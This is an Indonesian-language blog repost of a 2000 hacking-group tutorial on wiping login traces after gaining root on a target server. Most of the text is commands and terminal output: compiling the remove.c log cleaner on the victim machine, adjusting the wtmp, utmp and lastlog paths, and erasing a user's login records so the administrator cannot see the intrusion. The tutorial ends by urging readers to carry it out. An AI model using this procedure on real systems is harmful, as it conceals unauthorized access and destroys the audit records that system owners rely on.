Hapus Log .....!Silahkan....Baca dulu ..!

Hacking and Cracking is Different...So..Please your thinking about them..!!

>>>>>Mari kita bahas sedikit artikel yang lebih menarik lagi........!!!
Nihh asli terbitan dari kecoak e-lektronik iya...kan..? Baca aja dehh..ketimbang cape ngasih komentar melulu...


Terbitan Online Kecoak Elektronikhttp://k-elektronik.org
============================================================
Bagaimana menghapus jejakScript Kiddies Tutorial(c) cbug aka CyberBug (Kecoak Elektronik)============================================================
Pemberitahuan :1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapasaja yang ingin mengembangkan pengetahuan networking/internet mereka.2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikelini.3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penuliseksploit/script dengan harapan pembaca juga tetap menyertakan kredituntuk mereka, jangan mengganti nama2 penulis artikel/eksploit/scriptdengan nama anda dengan harapan nanti dianggap hacker.

A. Apa yang harus ada
1. Server yang berhasil di rootTerserah mo pake apa, boljug pake contoh eksploit pada artikel sayasebelumnya, pake remote eksploit juga boleh
2. Program penghapus LogAda banyak dan bermacam-macam program penghapus log, pilih apa yangmenurut kamu bagus dan cocok buat kamu, untuk langkah awal kamu bisacoba gunakan remove.c dari Simple Nomad.

B. Menghapus jejak [Bukan Album Peterpan yahh...]

Nah … kamu sudah dapat akses root, asyiiik … tapi eh nanti dulu,gimana kalo adminnya tau?, gak … dia gak bakalan tau, kalau kamu pakeprogram penghapus log untuk menghilangkan jejak kamu.Caranya? … download remove.c dari site k-elektronik, kemudian compiledi mesin sasaran kamu, baca dulu baik2 cara compile nya di source remove.cBTW … remove harus di running sebagai root (untuk latihan, bisa sajakamu login root di mesin kamu sendiri).

a. Perlu diperhatikan bagian berikut ini :

#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP “/var/adm/wtmp”
#define UTMP “/var/adm/utmp”
#define LASTLOG “/var/adm/lastlog”
#endif

Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada padaposisi yang sama, misalnya distro Slackware menaruh file2 tsb diatas di:

#define WTMP “/var/log/wtmp”
#define UTMP “/var/run/utmp”
#define LASTLOG “/var/log/lastlog”

Jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudahsesuai dengan source remove.c
Kamu bisa gunakan perintah :
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
atau
where is wtmp
where is utmp
where is lastlog
Kemudian ganti posisi file2 tersebut di remove.c sesuai dengan hasildiatas.

b. Kita compile sekarang? … ayooooooooooooo.
kecoak:/home/cbug/tools# gcc remove.c -o remove -DGENERIC
remove.c: In function `main’:
remove.c:50: warning: return type of `main’ is not `int’
/tmp/ccZVzySI.o: In function `main’:
/tmp/ccZVzySI.o(.text+0xb4): the `gets’ function is dangerous and shouldnot be used.

...ada warning message … gak apa2, warning bukan error

c. Cek last login nya user (cbug misalnya)

kecoak:/home/cbug/tools# lastlog grep cbugcbug tty2 Sat Mar 11 11:32:42 -0800 2000

d. Jalankan remove

kecoak:/home/cbug/tools# ./remove cbug
REMOVE by Simple NomadNomad Mobile Research Centre (c) 1997.
Found 549 record(s) for user cbugWill attempt a lastlog cleanup by default.
# - remove last # records from utmp/wtmpa
a- remove (a)ll records from utmp/wtmpq
q- (q)uit program
Enter selection ->

e. Hapus record terakhir (ketik #), atau boleh juga semua (a)
Enter selection -> #
REMOVE cleaned up 0 record(s) from /var/log/wtmp
REMOVE cleaned up 0 record(s) from /var/run/utmp
REMOVE cleaned up /var/log/lastlog

f. Cek last log nya cbug
kecoak:/home/cbug/tools# lastlog grep cbugcbug **Never logged in**

g. Ini hasilnya kalo cbug login :
Selamat datang di sarang Kecoak Elektronik
kecoak login: cbugPassword:
Kecoak’s K-Rad OSNo mail.
kecoak:~$

h. Biasanya kalo last log nya dicatat (belum/gak dihapus) cbug bisa liatgini, (perhatikan bagian Last login nya) :
Selamat datang di sarang Kecoak Elektronik
kecoak login: cbugPassword:
Kecoak’s K-Rad OS
Last login:
Sat Mar 11 12:06:02 -0800 2000 on tty3.
No mail.
kecoak:~$

i. Sekarang mohon anda laksanakan...!@!!!

–Manado, Awal Maret 2000cbug